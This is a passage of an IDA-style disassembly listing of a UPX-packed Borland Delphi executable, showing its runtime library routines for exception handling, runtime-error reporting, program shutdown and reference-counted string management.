jz loc_402C57
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_402BB8
call sub_402A68
cmp byte_40B008, 0
jbe short loc_402BB8
cmp byte_40B004, 0
ja short loc_402BB8
lea ecx, [esp+arg_0]
push eax
push ecx
call sub_4010C0 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_402C57
mov edx, eax
mov eax, [esp+arg_0]
mov ecx, [eax+0Ch]
jmp short loc_402BE8
; ---------------------------------------------------------------------------
loc_402BB8: ; CODE XREF: sub_402B34+4B�j
; sub_402B34+59�j ...
mov edx, eax
mov eax, [esp+arg_0]
mov ecx, [eax+0Ch]
loc_402BC1: ; CODE XREF: sub_402B34+1D�j
cmp byte_40B008, 1
jbe short loc_402BE8
cmp byte_40B004, 0
ja short loc_402BE8
push eax
lea eax, [esp+4+arg_0]
push edx
push ecx
push eax
call sub_4010C0 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_402C57
loc_402BE8: ; CODE XREF: sub_402B34+82�j
; sub_402B34+94�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_4]
push 0
push eax
push offset loc_402C0B
push edx
call sub_4010A8 ; RtlUnwind
loc_402C0B: ; DATA XREF: sub_402B34+CC�o
mov edi, [esp+arg_24]
call sub_405564
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset loc_402C37
add ebx, 5
call sub_402A9C
jmp ebx
; ---------------------------------------------------------------------------
loc_402C37: ; DATA XREF: sub_402B34+F2�o
jmp loc_402C60
; ---------------------------------------------------------------------------
call sub_405564
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_4028F4
; ---------------------------------------------------------------------------
loc_402C57: ; CODE XREF: sub_402B34+B�j
; sub_402B34+2D�j ...
mov eax, 1
retn
sub_402B34 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_409BA8
loc_402C60: ; CODE XREF: sub_4018C0:loc_401976�j
; sub_401984:loc_401A5A�j ...
mov eax, [esp-4+arg_0]
mov edx, [esp-4+arg_4]
test dword ptr [eax+4], 6
jz short loc_402C90
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_402C90
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_402AD0
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_402C90: ; CODE XREF: sub_409BA8-6F39�j
; DATA XREF: sub_409BA8-6F34�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_409BA8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402C98 proc near ; CODE XREF: sub_406454+11�p
; sub_40646C+37�p ...
pop edx
push esp
push ebp
push edi
push esi
push ebx
push eax
push edx
push esp
push 7
push 1
push 0EEDFADEh
push edx
jmp sub_401098
sub_402C98 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402CB4 proc near ; CODE XREF: UPX0:loc_402A23�p
; sub_402EE0+50�p ...
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_402CFF
call sub_405564
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_402CEE
mov eax, [edx+8]
call sub_4028F4
call sub_402A4C
loc_402CEE: ; CODE XREF: sub_402CB4+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_402CFF: ; DATA XREF: sub_402CB4+4�o
mov eax, 1
retn
sub_402CB4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402D08 proc near ; CODE XREF: sub_402EE0+55�p
; sub_402F40+55�p ...
arg_2C = dword ptr 30h
call sub_405564
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_4028F4
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_402AF8
jmp edx
sub_402D08 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402D38 proc near ; CODE XREF: sub_401F94+ED�p
; sub_401F94+142�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_402D38 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402D50 proc near ; CODE XREF: UPX0:00402DF3�p
mov [esp+0], edx
jmp sub_4031BC
sub_402D50 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_402D5C: ; CODE XREF: UPX0:00402E5B�j
; UPX0:00402E67�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_402D97
jz short loc_402DC9
cmp eax, 0C000008Eh
jg short loc_402D89
jz short loc_402DCD
sub eax, 0C0000005h
jz short loc_402DD9
sub eax, 87h
jz short loc_402DC1
dec eax
jz short loc_402DD5
jmp short loc_402DE9
; ---------------------------------------------------------------------------
loc_402D89: ; CODE XREF: UPX0:00402D72�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_402DC9
jz short loc_402DC5
jmp short loc_402DE9
; ---------------------------------------------------------------------------
loc_402D97: ; CODE XREF: UPX0:00402D69�j
cmp eax, 0C0000096h
jg short loc_402DAF
jz short loc_402DDD
sub eax, 0C0000093h
jz short loc_402DD5
dec eax
jz short loc_402DBD
dec eax
jz short loc_402DD1
jmp short loc_402DE9
; ---------------------------------------------------------------------------
loc_402DAF: ; CODE XREF: UPX0:00402D9C�j
sub eax, 0C00000FDh
jz short loc_402DE5
sub eax, 3Dh
jz short loc_402DE1
jmp short loc_402DE9
; ---------------------------------------------------------------------------
loc_402DBD: ; CODE XREF: UPX0:00402DA8�j
mov al, 0C8h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DC1: ; CODE XREF: UPX0:00402D82�j
mov al, 0C9h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DC5: ; CODE XREF: UPX0:00402D93�j
mov al, 0CDh
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DC9: ; CODE XREF: UPX0:00402D6B�j
; UPX0:00402D91�j
mov al, 0CFh
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DCD: ; CODE XREF: UPX0:00402D74�j
mov al, 0C8h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: UPX0:00402DAB�j
mov al, 0D7h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DD5: ; CODE XREF: UPX0:00402D85�j
; UPX0:00402DA5�j
mov al, 0CEh
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DD9: ; CODE XREF: UPX0:00402D7B�j
mov al, 0D8h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DDD: ; CODE XREF: UPX0:00402D9E�j
mov al, 0DAh
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DE1: ; CODE XREF: UPX0:00402DB9�j
mov al, 0D9h
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DE5: ; CODE XREF: UPX0:00402DB4�j
mov al, 0CAh
jmp short loc_402DEB
; ---------------------------------------------------------------------------
loc_402DE9: ; CODE XREF: UPX0:00402D87�j
; UPX0:00402D95�j ...
mov al, 0FFh
loc_402DEB: ; CODE XREF: UPX0:00402DBF�j
; UPX0:00402DC3�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_402D50
; ---------------------------------------------------------------------------
db 5Dh ; ]
db 0C2h ;
db 4
db 0
; ---------------------------------------------------------------------------
loc_402DFC: ; DATA XREF: sub_402E98+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_402E95
cmp byte_40B004, 0
ja short loc_402E25
lea eax, [esp+4]
push eax
call sub_4010C0 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_402E95
loc_402E25: ; CODE XREF: UPX0:00402E14�j
mov eax, [esp+4]
cld
call sub_402888
mov edx, [esp+8]
push 0
push eax
push offset loc_402E41
push edx
call sub_4010A8 ; RtlUnwind
loc_402E41: ; DATA XREF: UPX0:00402E36�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_402E70
mov edx, off_40C00C
test edx, edx
jz loc_402D5C
mov eax, ebx
call edx ; sub_407F2C
test eax, eax
jz loc_402D5C
mov edx, [ebx+0Ch]
loc_402E70: ; CODE XREF: UPX0:00402E51�j
call sub_402B14
mov ecx, off_40C000
test ecx, ecx
jz short loc_402E81
call ecx ; sub_407FF8
loc_402E81: ; CODE XREF: UPX0:00402E7D�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_4031BC
; ---------------------------------------------------------------------------
loc_402E95: ; CODE XREF: UPX0:00402E07�j
; UPX0:00402E23�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_402E98 proc near ; CODE XREF: sub_402FA0+1D�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_402DFC
mov [eax+8], ebp
mov dword_40C4A8, eax
retn
sub_402E98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402EB8 proc near ; CODE XREF: sub_403090:loc_40314C�p
xor edx, edx
mov eax, dword_40C4A8
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_402ECF
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_402ECD: ; CODE XREF: sub_402EB8+1E�j
mov ecx, [ecx]
loc_402ECF: ; CODE XREF: sub_402EB8+D�j
cmp ecx, 0FFFFFFFFh
jz short locret_402EDC
cmp [ecx], eax
jnz short loc_402ECD
mov eax, [eax]
mov [ecx], eax
locret_402EDC: ; CODE XREF: sub_402EB8+1A�j
retn
sub_402EB8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EE0 proc near ; CODE XREF: sub_402EE0+4B�p
; sub_402F40+4B�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, offset dword_40C4A4
mov eax, [edi+8]
test eax, eax
jz short loc_402F3A
mov ebx, [edi+0Ch]
mov esi, [eax+4]
xor edx, edx
push ebp
push offset loc_402F26
push dword ptr fs:[edx]
mov fs:[edx], esp
test ebx, ebx
jle short loc_402F1C
loc_402F0A: ; CODE XREF: sub_402EE0+3A�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_402F18
call eax
loc_402F18: ; CODE XREF: sub_402EE0+34�j
test ebx, ebx
jg short loc_402F0A
loc_402F1C: ; CODE XREF: sub_402EE0+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402F3A
; ---------------------------------------------------------------------------
loc_402F26: ; DATA XREF: sub_402EE0+1B�o
jmp sub_402B34
; ---------------------------------------------------------------------------
call sub_402EE0
call sub_402CB4
call sub_402D08
loc_402F3A: ; CODE XREF: sub_402EE0+10�j
; sub_402EE0+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402EE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F40 proc near ; CODE XREF: sub_402FA0+29�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, off_40C4AC
test eax, eax
jz short loc_402F9A
mov esi, [eax]
xor ebx, ebx
mov edi, [eax+4]
xor edx, edx
push ebp
push offset loc_402F86
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp esi, ebx
jle short loc_402F7C
loc_402F68: ; CODE XREF: sub_402F40+3A�j
mov eax, [edi+ebx*8]
inc ebx
mov dword_40C4B0, ebx
test eax, eax
jz short loc_402F78
call eax
loc_402F78: ; CODE XREF: sub_402F40+34�j
cmp esi, ebx
jg short loc_402F68
loc_402F7C: ; CODE XREF: sub_402F40+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402F9A
; ---------------------------------------------------------------------------
loc_402F86: ; DATA XREF: sub_402F40+19�o
jmp sub_402B34
; ---------------------------------------------------------------------------
call sub_402EE0
call sub_402CB4
call sub_402D08
loc_402F9A: ; CODE XREF: sub_402F40+D�j
; sub_402F40+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402FA0 proc near ; CODE XREF: sub_4055F4+2C�p
mov off_40C4AC, eax
xor eax, eax
mov dword_40C4B0, eax
mov dword_40C4B4, edx
mov eax, [edx+4]
mov dword_40C020, eax
call sub_402E98
mov byte_40C028, 0
call sub_402F40
retn
sub_402FA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402FD0 proc near ; CODE XREF: UPX0:004094DB�p
push ebx
push esi
mov ebx, [eax]
lea esi, [eax+4]
loc_402FD7: ; CODE XREF: sub_402FD0+17�j
mov eax, [esi+4]
mov edx, [esi]
mov eax, [eax]
call sub_40478C
add esi, 8
dec ebx
jnz short loc_402FD7
pop esi
pop ebx
retn
sub_402FD0 endp
; =============== S U B R O U T I N E =======================================
sub_402FEC proc near ; CODE XREF: UPX0:004094E5�p
push ebx
push esi
mov ebx, [eax]
lea esi, [eax+4]
loc_402FF3: ; CODE XREF: sub_402FEC+19�j
mov eax, [esi+4]
mov edx, [esi]
mov ecx, [esi+8]
mov eax, [eax]
add eax, ecx
mov [edx], eax
add esi, 0Ch
dec ebx
jnz short loc_402FF3
pop esi
pop ebx
retn
sub_402FEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40300C proc near ; CODE XREF: sub_403090+38�p
push ebx
mov eax, dword_40C038
mov ebx, (offset aRuntimeErrorAt+10h)
mov ecx, 0Ah
loc_40301D: ; CODE XREF: sub_40300C+1D�j
xor edx, edx
div ecx
add dl, 30h
mov [ebx], dl
dec ebx
test eax, eax
jnz short loc_40301D
mov eax, dword_40C040
call sub_4042AC
mov edx, dword_40C040
xchg eax, edx
sub eax, edx
mov ebx, (offset aRuntimeErrorAt+1Ch)
loc_403044: ; CODE XREF: sub_40300C+49�j
mov edx, eax
and edx, 0Fh
mov dl, byte_40B054[edx]
mov [ebx], dl
dec ebx
shr eax, 4
jnz short loc_403044
pop ebx
retn
sub_40300C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40305C proc near ; CODE XREF: sub_403090+D0�p
mov edi, offset dword_40C4A4
mov ebx, dword_40C4BC
mov ebp, dword_40C4B8
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
xor eax, eax
xchg eax, dword_40C038
neg eax
sbb eax, eax
inc eax
leave
retn 0Ch
sub_40305C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403090 proc near ; CODE XREF: sub_4031B0+6�j
; sub_40ADDC+39�p ...
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_40C4A4
mov esi, offset dword_40C038
mov edi, offset dword_40C03C
cmp byte ptr [ebx+24h], 0
jnz short loc_4030BF
cmp dword ptr [edi], 0
jz short loc_4030BF
loc_4030AE: ; CODE XREF: sub_403090+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_4030AE
loc_4030BF: ; CODE XREF: sub_403090+17�j
; sub_403090+1C�j
cmp dword_40C040, 0
jz short loc_40310F
call sub_40300C
cmp byte_40C048, 0
jz short loc_4030EC
mov edx, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov eax, offset dword_40C21C
call sub_404E00
call sub_404D83
jmp short loc_403108
; ---------------------------------------------------------------------------
loc_4030EC: ; CODE XREF: sub_403090+44�j
cmp byte_40B00C, 0
jnz short loc_403108
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_4010E0 ; MessageBoxA
loc_403108: ; CODE XREF: sub_403090+5A�j
; sub_403090+63�j
xor eax, eax
mov dword_40C040, eax
loc_40310F: ; CODE XREF: sub_403090+36�j
; sub_403090+F1�j
cmp byte ptr [ebx+24h], 2
jnz short loc_40311F
cmp dword ptr [esi], 0
jnz short loc_40311F
xor eax, eax
mov [ebx+0Ch], eax
loc_40311F: ; CODE XREF: sub_403090+83�j
; sub_403090+88�j
call sub_402EE0
cmp byte ptr [ebx+24h], 1
jbe short loc_40312F
cmp dword ptr [esi], 0
jz short loc_40314C
loc_40312F: ; CODE XREF: sub_403090+98�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_40314C
call sub_40471C
mov eax, [ebx+10h]
mov edx, [eax+10h]
cmp edx, [eax+4]
jz short loc_40314C
push edx
call sub_4010F8 ; FreeLibrary
loc_40314C: ; CODE XREF: sub_403090+9D�j
; sub_403090+A4�j ...
call sub_402EB8
cmp byte ptr [ebx+24h], 1
jnz short loc_40315A
call dword ptr [ebx+28h]
loc_40315A: ; CODE XREF: sub_403090+C5�j
cmp byte ptr [ebx+24h], 0
jz short loc_403165
call sub_40305C
loc_403165: ; CODE XREF: sub_403090+CE�j
cmp dword ptr [ebx], 0
jnz short loc_403172
mov eax, [esi]
push eax
call sub_4010D8 ; ExitProcess
loc_403172: ; CODE XREF: sub_403090+D8�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp short loc_40310F
sub_403090 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
aPortionsCopyri db 'Portions Copyright (c) 1983,99 Borland',0
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4031B0 proc near ; CODE XREF: sub_4031BC+6�j
; sub_407FF8+A�p
mov dword_40C038, eax
jmp sub_403090
sub_4031B0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4031BC proc near ; CODE XREF: sub_4025D4:loc_4025F8�j
; sub_402D50+3�j ...
pop dword_40C040
jmp sub_4031B0
sub_4031BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4031C8 proc near ; CODE XREF: sub_4032B0+23�p
; sub_4032E0+16�p ...
mov edx, [eax]
test edx, edx
jz short locret_4031EA
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_4031EA
lock dec dword ptr [edx-8]
jnz short locret_4031EA
push eax
lea eax, [edx-8]
call sub_40256C
pop eax
locret_4031EA: ; CODE XREF: sub_4031C8+4�j
; sub_4031C8+10�j ...
retn
sub_4031C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4031EC proc near ; CODE XREF: sub_40387C+63�p
; sub_407250+10D�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_4031F2: ; CODE XREF: sub_4031EC+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_403212
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_403212
lock dec dword ptr [edx-8]
jnz short loc_403212
lea eax, [edx-8]
call sub_40256C
loc_403212: ; CODE XREF: sub_4031EC+A�j
; sub_4031EC+16�j ...
add ebx, 4
dec esi
jnz short loc_4031F2
pop esi
pop ebx
retn
sub_4031EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40321C proc near ; CODE XREF: sub_40342C+8�j
; sub_403470+6�j ...
test edx, edx
jz short loc_403244
mov ecx, [edx-8]
inc ecx
jg short loc_403240
push eax
push edx
mov eax, [edx-4]
call sub_40328C
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_402660
pop edx
pop eax
jmp short loc_403244
; ---------------------------------------------------------------------------
loc_403240: ; CODE XREF: sub_40321C+8�j
lock inc dword ptr [edx-8]
loc_403244: ; CODE XREF: sub_40321C+2�j
; sub_40321C+22�j
xchg edx, [eax]
test edx, edx
jz short locret_40325E
mov ecx, [edx-8]
dec ecx
jl short locret_40325E
lock dec dword ptr [edx-8]
jnz short locret_40325E
lea eax, [edx-8]
call sub_40256C
locret_40325E: ; CODE XREF: sub_40321C+2C�j
; sub_40321C+32�j ...
retn
sub_40321C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403260 proc near ; CODE XREF: sub_407BC8+2E�p
; sub_4083E0+1ED�p ...
test edx, edx
jz short loc_40326E
mov ecx, [edx-8]
inc ecx
jle short loc_40326E
lock inc dword ptr [edx-8]
loc_40326E: ; CODE XREF: sub_403260+2�j
; sub_403260+8�j
xchg edx, [eax]
test edx, edx
jz short locret_403288
mov ecx, [edx-8]
dec ecx
jl short locret_403288
lock dec dword ptr [edx-8]
jnz short locret_403288
lea eax, [edx-8]
call sub_40256C
locret_403288: ; CODE XREF: sub_403260+12�j
; sub_403260+18�j ...
retn
sub_403260 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40328C proc near ; CODE XREF: sub_40321C+F�p
; sub_4032B0+B�p ...
test eax, eax
jle short loc_4032AC
push eax
add eax, 9
call sub_402554
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
mov byte ptr [eax+edx], 0
retn
; ---------------------------------------------------------------------------
loc_4032AC: ; CODE XREF: sub_40328C+2�j
xor eax, eax
retn
sub_40328C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4032B0 proc near ; CODE XREF: sub_4032E0+4A�p
; sub_4032E0+6C�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_40328C
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_4032D1
mov edx, eax
mov eax, esi
call sub_402660
loc_4032D1: ; CODE XREF: sub_4032B0+16�j
mov eax, ebx
call sub_4031C8
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_4032B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4032E0 proc near ; CODE XREF: sub_4033B0:loc_4033E3�j
; sub_403410:loc_40341B�j
var_810 = byte ptr -810h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF800h
mov ebx, ecx
mov ebp, edx
mov edi, eax
test ebx, ebx
jg short loc_4032FD
mov eax, edi
call sub_4031C8
jmp short loc_403364
; ---------------------------------------------------------------------------
loc_4032FD: ; CODE XREF: sub_4032E0+12�j
cmp ebx, 400h
jge short loc_403331
push 0
push 0
push 800h
lea eax, [esp+81Ch+var_810]
push eax
push ebx
push ebp
push 0
push 0
call sub_401188 ; WideCharToMultiByte
mov esi, eax
test esi, esi
jle short loc_403331
mov edx, esp
mov eax, edi
mov ecx, esi
call sub_4032B0
jmp short loc_403364
; ---------------------------------------------------------------------------
loc_403331: ; CODE XREF: sub_4032E0+23�j
; sub_4032E0+42�j
push 0
push 0
push 0
push 0
push ebx
push ebp
push 0
push 0
call sub_401188 ; WideCharToMultiByte
mov esi, eax
mov eax, edi
mov ecx, esi
xor edx, edx
call sub_4032B0
push 0
push 0
push esi
mov eax, [edi]
push eax
push ebx
push ebp
push 0
push 0
call sub_401188 ; WideCharToMultiByte
loc_403364: ; CODE XREF: sub_4032E0+1B�j
; sub_4032E0+4F�j
add esp, 800h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4032E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403370 proc near ; CODE XREF: sub_4074D8+8F�p
; sub_4074D8+188�p ...
push edx
mov edx, esp
mov ecx, 1
call sub_4032B0
pop edx
retn
sub_403370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403380 proc near ; CODE XREF: sub_40478C+48�p
; sub_407374+28�p ...
xor ecx, ecx
test edx, edx
jz short loc_4033A7
push edx
loc_403387: ; CODE XREF: sub_403380+1D�j
cmp cl, [edx]
jz short loc_4033A2
cmp cl, [edx+1]
jz short loc_4033A1
cmp cl, [edx+2]
jz short loc_4033A0
cmp cl, [edx+3]
jz short loc_40339F
add edx, 4
jmp short loc_403387
; ---------------------------------------------------------------------------
loc_40339F: ; CODE XREF: sub_403380+18�j
inc edx
loc_4033A0: ; CODE XREF: sub_403380+13�j
inc edx
loc_4033A1: ; CODE XREF: sub_403380+E�j
inc edx
loc_4033A2: ; CODE XREF: sub_403380+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_4033A7: ; CODE XREF: sub_403380+4�j
jmp sub_4032B0
sub_403380 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4033B0 proc near ; CODE XREF: sub_406AC7+1DD�p
; DATA XREF: sub_406AC7:loc_406C8A�o
xor ecx, ecx
test edx, edx
jz short loc_4033E3
push edx
loc_4033B7: ; CODE XREF: sub_4033B0+21�j
cmp cx, [edx]
jz short loc_4033DC
cmp cx, [edx+2]
jz short loc_4033D9
cmp cx, [edx+4]
jz short loc_4033D6
cmp cx, [edx+6]
jz short loc_4033D3
add edx, 8
jmp short loc_4033B7
; ---------------------------------------------------------------------------
loc_4033D3: ; CODE XREF: sub_4033B0+1C�j
add edx, 2
loc_4033D6: ; CODE XREF: sub_4033B0+16�j
add edx, 2
loc_4033D9: ; CODE XREF: sub_4033B0+10�j
add edx, 2
loc_4033DC: ; CODE XREF: sub_4033B0+A�j
mov ecx, edx
pop edx
sub ecx, edx
shr ecx, 1
loc_4033E3: ; CODE XREF: sub_4033B0+4�j
jmp sub_4032E0
sub_4033B0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033EC proc near ; CODE XREF: sub_4036B0+25�p
; sub_4036B0+44�p
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_4032B0
sub_4033EC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033F8 proc near ; CODE XREF: sub_406548+58�p
; sub_407D60+BB�p ...
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_403405
not ecx
loc_403405: ; CODE XREF: sub_4033F8+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_4032B0
sub_4033F8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403410 proc near ; CODE XREF: sub_409AA8+85�p
; sub_409AA8+94�p ...
xor ecx, ecx
test edx, edx
jz short loc_40341B
mov ecx, [edx-4]
shr ecx, 1
loc_40341B: ; CODE XREF: sub_403410+4�j
jmp sub_4032E0
sub_403410 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403424 proc near ; CODE XREF: sub_403C30+E�p
; sub_403C30+17�p ...
test eax, eax
jz short locret_40342B
mov eax, [eax-4]
locret_40342B: ; CODE XREF: sub_403424+2�j
retn
sub_403424 endp
; =============== S U B R O U T I N E =======================================
sub_40342C proc near ; CODE XREF: sub_403470+1D�j
; sub_403470+6E�j ...
test edx, edx
jz short locret_40346F
mov ecx, [eax]
test ecx, ecx
jz sub_40321C
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_403464
call sub_403624
mov eax, esi
mov ecx, [esi-4]
loc_403457: ; CODE XREF: sub_40342C+41�j
mov edx, [ebx]
add edx, edi
call sub_402660
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403464: ; CODE XREF: sub_40342C+1F�j
call sub_403624
mov eax, [ebx]
mov ecx, edi
jmp short loc_403457
; ---------------------------------------------------------------------------
locret_40346F: ; CODE XREF: sub_40342C+2�j
retn
sub_40342C endp
; =============== S U B R O U T I N E =======================================
sub_403470 proc near ; CODE XREF: sub_40A5A0+77�p
; sub_40A5A0+18D�p ...
test edx, edx
jz short loc_4034D5
test ecx, ecx
jz sub_40321C
cmp edx, [eax]
jz short loc_4034DC
cmp ecx, [eax]
jz short loc_403492
push eax
push ecx
call sub_40321C
pop edx
pop eax
jmp sub_40342C
; ---------------------------------------------------------------------------
loc_403492: ; CODE XREF: sub_403470+12�j
push ebx
push esi
push edi
mov ebx, edx
mov esi, ecx
push eax
mov eax, [ebx-4]
add eax, [esi-4]
call sub_40328C
mov edi, eax
mov edx, eax
